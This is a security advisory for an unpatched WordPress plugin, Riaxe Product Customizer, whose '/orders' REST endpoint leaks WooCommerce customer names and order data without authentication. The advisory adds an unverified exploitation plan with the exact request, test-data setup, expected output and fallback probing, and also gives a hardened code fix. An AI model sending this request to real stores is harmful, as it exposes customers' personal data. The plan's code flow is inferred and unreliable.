CVE-2026-3594

Riaxe Product Customizer <= 2.4 - Unauthenticated Sensitive Information Disclosure via '/orders' REST API Endpoint

Severity: Medium
Weakness: Exposure of Sensitive Information to an Unauthorized Actor
CVSS Score: 5.3
Patched in: Unpatched
Time to patch: N/A

Description

The Riaxe Product Customizer plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.4 via the '/wp-json/InkXEProductDesignerLite/orders' REST API endpoint. The endpoint is registered with 'permission_callback' set to '__return_true', meaning no authentication or authorization checks are performed. The endpoint queries WooCommerce order data from the database and returns it to the requester, including customer first and last names, customer IDs, order IDs, order totals, order dates, currencies, and order statuses. This makes it possible for unauthenticated attackers to extract sensitive customer and order information from the WooCommerce store.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: Low
Integrity: None
Availability: None

Technical Details

Affected versions: <= 2.4
Published: April 7, 2026
Last updated: April 8, 2026
Research Plan
Unverified

This research plan outlines the technical steps required to demonstrate the unauthenticated sensitive information disclosure vulnerability in the Riaxe Product Customizer plugin.

1. Vulnerability Summary

The Riaxe Product Customizer plugin (<= 2.4) registers a custom WordPress REST API endpoint /wp-json/InkXEProductDesignerLite/orders intended to retrieve order data. However, the permission_callback for this route is set to __return_true, which bypasses WordPress's built-in authentication and authorization mechanisms. Consequently, any unauthenticated user can query the endpoint to retrieve sensitive WooCommerce order details, including customer names, IDs, order totals, and statuses.

2. Attack Vector Analysis

  • Endpoint: /wp-json/InkXEProductDesignerLite/orders
  • HTTP Method: GET (inferred)
  • Authentication: None required (permission_callback is __return_true).
  • Payload: No specific payload required; a simple GET request triggers the data leak.
  • Preconditions:
    1. The plugin "Riaxe Product Customizer" must be active.
    2. WooCommerce must be installed and have existing order data for the exposure to be impactful.

3. Code Flow (Inferred)

  1. Hook Registration: The plugin likely uses the rest_api_init hook to register its API routes.
  2. Route Definition: Inside the registration function, register_rest_route is called:
    register_rest_route('InkXEProductDesignerLite', '/orders', array(
        'methods'             => 'GET', // or WP_REST_Server::READABLE
        'callback'            => array($this, 'get_all_orders'), // (inferred callback name)
        'permission_callback' => '__return_true', // THE VULNERABILITY
    ));
    
  3. Data Retrieval: The callback function queries the WooCommerce orders (likely using wc_get_orders or a direct global $wpdb query on wp_posts and wp_postmeta).
  4. Data Output: The function returns a WP_REST_Response containing an array of order objects, which WordPress serializes into JSON.
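The defect in the flow above is entirely in the permission_callback: '__return_true' tells WordPress to skip authorization, so the callback's order query runs for every request. The following is an added example, not the plugin's code, showing the same route registered with a real authorization check; it uses the real WordPress and WooCommerce APIs (register_rest_route, current_user_can, rest_authorization_required_code, wc_get_orders), while the inkxe_example_* function names and the returned field set are assumptions.

```php
<?php
/**
 * Added example (not the Riaxe plugin's own code): a hardened registration
 * of the '/orders' route. Function names prefixed 'inkxe_example_' are
 * hypothetical; the WordPress/WooCommerce calls are real APIs.
 */

// Permission callback: WordPress runs this before the route callback.
// Returning a WP_Error (or false) ends the request with 401/403 and the
// order query below never executes.
function inkxe_example_can_read_orders( WP_REST_Request $request ) {
    // Cookie-authenticated callers must also send a valid X-WP-Nonce for
    // the 'wp_rest' action; core checks it earlier and, on failure, treats
    // the caller as logged out, so current_user_can() fails here as well.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        return new WP_Error(
            'rest_forbidden',
            __( 'You are not allowed to view orders.', 'inkxe-example' ),
            // 401 for anonymous callers, 403 for logged-in users lacking the cap.
            array( 'status' => rest_authorization_required_code() )
        );
    }
    return true;
}

// Route callback: expose only the fields the feature actually needs, rather
// than whole order objects with customer names and IDs.
function inkxe_example_get_orders( WP_REST_Request $request ) {
    $orders = wc_get_orders( array(
        'limit'   => 20,
        'orderby' => 'date',
        'order'   => 'DESC',
    ) );
    $out = array();
    foreach ( $orders as $order ) {
        $out[] = array(
            'order_id' => $order->get_id(),
            'status'   => $order->get_status(),
            'total'    => $order->get_total(),
        );
    }
    return rest_ensure_response( $out );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'InkXEProductDesignerLite', '/orders', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'inkxe_example_get_orders',
        'permission_callback' => 'inkxe_example_can_read_orders', // fixed
    ) );
} );
```

With this registration the unauthenticated GET in the research plan receives a 401 with code rest_forbidden instead of order data, which is also the response a site owner should see when re-testing after an upgrade.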

4. Nonce Acquisition Strategy

According to the vulnerability description, the permission_callback is set to __return_true. In the WordPress REST API, when a route is configured this way, no X-WP-Nonce header or cookie-based authentication is required to access the endpoint.

If the environment configuration or a security plugin later enforced a global REST nonce requirement, the nonce for the wp_rest action would be needed. However, for a standard PoC of this specific vulnerability, no nonce is expected to be necessary.

5. Exploitation Strategy

The exploitation involves a direct request to the exposed REST endpoint.

  • Step 1: Verify the endpoint exists and is reachable.
  • Step 2: Send a GET request to the target.
  • Step 3: Parse the JSON response to confirm the presence of customer names and order totals.

HTTP Request (via http_request tool):

GET /wp-json/InkXEProductDesignerLite/orders HTTP/1.1
Host: localhost:8080
Accept: application/json

6. Test Data Setup

To verify the disclosure, mock data must exist in the WooCommerce system.

  1. Install/Activate Riaxe Product Customizer: Ensure version <= 2.4 is installed.
  2. Install/Activate WooCommerce: The plugin depends on WooCommerce data.
  3. Create a Customer User:
    wp user create victim_customer victim@example.com --role=customer --user_pass=password123
    
  4. Create Mock Orders: Use WP-CLI to generate an order (requires WooCommerce CLI support or manual DB insertion).
    # Alternative: Use a PHP script via wp eval to create an order
    wp eval '
    $order = wc_create_order();
    $order->set_billing_first_name("John");
    $order->set_billing_last_name("Doe");
    $order->set_total(99.99);
    $order->set_status("completed");
    $order->save();
    '
    

7. Expected Results

A successful exploit will return a 200 OK status and a JSON body containing an array of order objects.

Example Response Body:

[
  {
    "order_id": 123,
    "customer_id": 5,
    "first_name": "John",
    "last_name": "Doe",
    "order_total": "99.99",
    "order_date": "2023-10-27 10:00:00",
    "currency": "USD",
    "status": "completed"
  }
]

8. Verification Steps

  1. Identify Order in Database:
    wp db query "SELECT ID, post_status FROM wp_posts WHERE post_type='shop_order' LIMIT 1;"
    
  2. Compare API Output: Match the order_id and order_total from the HTTP response with the data returned by the CLI command:
    wp post get <ID> --field=post_title
    # and
    wp post meta get <ID> _order_total
    
  3. Check Sensitivity: Confirm that the first_name and last_name returned by the API match the billing information of the user associated with that order.

9. Alternative Approaches

If the /orders endpoint is not found, it is possible the namespace or route suffix varies slightly between minor versions.

  1. Enumerate Routes: Request the main REST index to discover the exact path:
    GET /wp-json/
    
    Then search the response for "InkXE".
  2. Check for POST: If GET returns a 405 Method Not Allowed, try a POST request with an empty body:
    POST /wp-json/InkXEProductDesignerLite/orders HTTP/1.1
    Content-Length: 0
    
  3. Examine Sub-directories: If the plugin follows a different naming convention, grep the source code for register_rest_route to find the exact string:
    grep -rn "register_rest_route" wp-content/plugins/riaxe-product-customizer/
    
